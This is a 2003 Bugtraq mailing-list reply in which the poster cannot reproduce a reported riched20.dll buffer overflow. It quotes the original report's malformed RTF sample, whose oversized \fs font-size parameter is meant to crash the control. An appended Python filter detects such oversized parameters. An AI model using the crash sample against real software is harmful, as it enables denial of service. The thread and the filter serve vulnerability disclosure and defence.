[28920] in bugtraq


Re: Riched20.DLL attribute label buffer overflow vulnerability

daemon@ATHENA.MIT.EDU (3APA3A)
Tue Feb 18 11:17:10 2003

Date: Tue, 18 Feb 2003 11:36:59 +0300
From: 3APA3A <3APA3A@SECURITY.NNOV.RU>
Reply-To: 3APA3A <3APA3A@SECURITY.NNOV.RU>
Message-ID: <7353719955.20030218113659@SECURITY.NNOV.RU>
To: bugtraq <bugtraq@securityfocus.com>
Resent-From: 3APA3A <3APA3A@SECURITY.NNOV.RU>
MIME-Version: 1.0
Content-Type: text/plain; charset=Windows-1251
Content-Transfer-Encoding: 8bit

Dear Jie Dong,

Can't reproduce it on riched20.dll v.3.0 (5.30.23.1200) under NT.

--Sunday, February 16, 2003, 4:30:50 PM, you wrote to bugtraq@securityfocus.com:


JD> The following RTF file may result in illegal operation:
JD> {\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0
JD> \fnil\fprq2\fcharset134        \'cb\'ce\'cc\'e5;}}        {\colortbl
JD> ;\red255\green0\blue255;}        \viewkind4\uc1\pard\cf1\kerning2\f0
JD> \fs18121111111111111111111111111111111110000
JD> www.yoursft.com\fs20\par  }  "\fs"  was used for setting the size of


-- 
~/ZARAZA
Man is a mystery... I study this mystery in order to be a human being. (Dostoevsky)
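
The quoted report singles out an `\fs` control word followed by a very long numeric parameter. As an added example (not part of the original thread), here is a defensive pre-filter that flags such parameters in RTF input before it reaches a rich-edit control. The 10-digit and signed 32-bit thresholds, the function name and the sample are assumptions of this example.

```python
import re

# Assumed thresholds (chosen for this example, not taken from the thread):
# a parameter of more than 10 digits cannot fit a signed 32-bit integer.
MAX_PARAM_DIGITS = 10
INT32_MIN, INT32_MAX = -2**31, 2**31 - 1

# Control word: backslash, ASCII letters, optional signed decimal parameter.
CONTROL_WORD = re.compile(rb"\\([A-Za-z]+)(-?[0-9]+)?")


def find_oversized_params(data: bytes):
    """Return (offset, word, digit_count) for every control word whose
    numeric parameter is too long or outside the signed 32-bit range."""
    findings = []
    pos = 0
    while pos < len(data):
        if data[pos:pos + 1] != b"\\":
            pos += 1
            continue
        m = CONTROL_WORD.match(data, pos)
        if m is None:
            # Control symbol (\\, \{, \}, \'hh): skip the backslash and the
            # next byte so an escaped backslash is not read as a control word.
            pos += 2
            continue
        word, param = m.group(1).decode("ascii"), m.group(2)
        pos = m.end()
        if param is None:
            continue
        digits = len(param.lstrip(b"-"))
        if digits > MAX_PARAM_DIGITS or not INT32_MIN <= int(param) <= INT32_MAX:
            findings.append((m.start(), word, digits))
        elif word == "bin" and int(param) > 0:
            # \binN: one delimiter space, then N raw bytes that are not RTF.
            pos += int(param) + (data[pos:pos + 1] == b" ")
    return findings


# Constructed sample: a normal \fs20, an escaped backslash followed by plain
# text that only looks like a control word, and an \fs with 40 digits.
SAMPLE = (rb"{\rtf1\ansi{\fonttbl{\f0\fnil Arial;}}\f0\fs20 ok\\fs99999999999 \par "
          rb"\fs" + b"1" * 40 + rb" text\par}")

if __name__ == "__main__":
    for offset, word, digits in find_oversized_params(SAMPLE):
        print(f"offset {offset}: \\{word} has a {digits}-digit parameter")
```
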

